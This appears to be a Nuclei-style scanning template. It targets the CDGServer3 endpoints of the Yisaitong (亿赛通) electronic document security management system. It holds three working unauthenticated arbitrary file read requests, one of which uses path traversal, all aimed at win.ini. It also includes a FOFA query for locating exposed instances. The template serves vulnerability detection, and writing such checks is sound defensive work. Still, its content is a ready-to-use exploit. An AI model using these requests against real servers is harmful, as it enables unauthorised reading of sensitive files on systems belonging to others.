http:
    - matchers:
        - part: body
          type: word
          words:
            - ; for 16-bit app support
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          POST /CDGServer3/downloadfromfile HTTP/1.1
          Host: {{Hostname}}
          Content-Type: application/x-www-form-urlencoded

          fileName=../../../../../../../../../../../windows/win.ini
        - |
          POST /CDGServer3/document/UploadFileManagerService;login HTTP/1.1
          Host: {{Hostname}}
          Content-Type: application/x-www-form-urlencoded

          command=ViewUploadFile&filePath=c:/windows/win.ini&fileName1=hello
        - |
          POST /CDGServer3/document/RestoreFiles;login HTTP/1.1
          Host: {{Hostname}}
          Content-Type: application/x-www-form-urlencoded

          command=DownloadDoc&fileNameForDownload=&downPath=c:/windows/win.ini
id: yisaitong-UploadFileManagerService_RestoreFiles_downloadfromfile-File-reading
info:
    author: Superhero
    description: |-
        fofa: body="/CDGServer3/index.jsp"
        亿赛通电子文档安全管理系统 UploadFileManagerService、RestoreFiles、downloadfromfile等接口处任意文件读取漏洞，未经身份验证的攻击者利用此漏洞获取系统内部敏感文件信息，导致系统处于极不安全的状态。
    name: 亿赛通电子文档安全管理系统 多处 任意文件读取漏洞
    reference:
        - https://blog.csdn.net/m0_60571842/article/details/141108810
    severity: high
    tags:
        - File reading
